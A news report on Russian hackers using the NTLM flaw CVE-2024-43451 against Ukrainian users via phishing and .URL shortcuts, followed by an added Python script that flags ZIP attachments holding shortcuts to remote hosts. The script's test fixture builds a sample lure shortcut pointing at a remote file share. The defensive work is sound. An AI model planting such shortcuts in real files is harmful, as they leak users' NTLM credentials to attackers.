Kyiv, November 14, 2024 – Russian hackers exploit NTLM flaw in Ukraine, targeting users through phishing emails and deploying malware to steal credentials. Microsoft issues urgent patch.
In a critical cyber assault, Russian hackers have exploited a recently uncovered NTLM vulnerability to target Ukrainian users in a widespread phishing campaign. The flaw, identified as CVE-2024-43451, is a security weakness in the NT LAN Manager (NTLM) protocol that allows attackers to steal user credentials without needing direct access to passwords.
The cyberattack was discovered by Israeli cybersecurity firm ClearSky, which reported that the Russian-linked threat group UAC-0194 executed these attacks by embedding malicious URLs in emails sent from compromised Ukrainian government servers. Victims were lured into downloading a file disguised as an official document from the Ukrainian Ministry of Education.
It’s a sophisticated attack. Minimal user interaction is required—just a single click or even right-clicking a malicious URL can trigger the breach.
The attack chain directs victims to download a ZIP file containing a malicious internet shortcut (.URL) file, which initiates connections to a remote server, ultimately deploying the Spark RAT malware on their systems. The attackers gain control and can use the stolen NTLM hash to perform Pass-the-Hash attacks, allowing unauthorized access as legitimate users.
This exploit not only compromises user privacy but allows the attackers to manipulate credentials at a massive scale, intensifying the cybersecurity threat to Ukraine.
Microsoft has since patched the vulnerability, but the attack highlights the ongoing cybersecurity tensions between Russia and Ukraine.
Ukrainian cybersecurity agencies continue to investigate and advise caution when opening government-related documents. This breach underscores the escalating risk of state-sponsored cyberattacks targeting critical systems in war-torn regions.
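A triage sketch for the attack chain described above, added here as an example and not taken from ClearSky, Microsoft or the original article: it lists every internet shortcut (.URL) inside a ZIP attachment that references a remote host, so the archive can be held for review before a user opens it. The function names, sample file names and the 198.51.100.7 address are constructed for illustration.

```python
import configparser
import io
import zipfile
from urllib.parse import urlparse

FIELDS = ("url", "iconfile")  # [InternetShortcut] keys that may hold a path or URL

def remote_host(value):
    """Return the host a shortcut field points at, or None for a local path."""
    if value.startswith("\\\\"):  # UNC form: \\host\share\...
        return value[2:].replace("/", "\\").split("\\", 1)[0] or None
    parsed = urlparse(value)
    return parsed.hostname if parsed.scheme and parsed.hostname else None

def scan_zip(data):
    """Return (member, field, host) for each remote reference in .url members."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as archive:
        for name in archive.namelist():
            if not name.lower().endswith(".url"):
                continue
            text = archive.read(name).decode("utf-8-sig", errors="replace")
            parser = configparser.RawConfigParser(strict=False)  # no % interpolation
            try:
                parser.read_string(text)
            except configparser.Error:
                findings.append((name, "unparsable", None))  # malformed: review by hand
                continue
            for section in parser.sections():
                if section.lower() != "internetshortcut":
                    continue
                for field in FIELDS:
                    host = remote_host(parser.get(section, field, fallback="").strip())
                    if host:
                        findings.append((name, field, host))
    return findings

def build_sample():
    """Constructed sample archive; names and the documentation-range IP are made up."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("certificate.url", "[InternetShortcut]\r\nURL=file://198.51.100.7/share/doc.pdf\r\n")
        archive.writestr("notes.url", "[InternetShortcut]\r\nURL=C:\\Users\\Public\\readme.txt\r\n")
        archive.writestr("readme.txt", "plain text")
    return buf.getvalue()

if __name__ == "__main__":
    print(scan_zip(build_sample()))
```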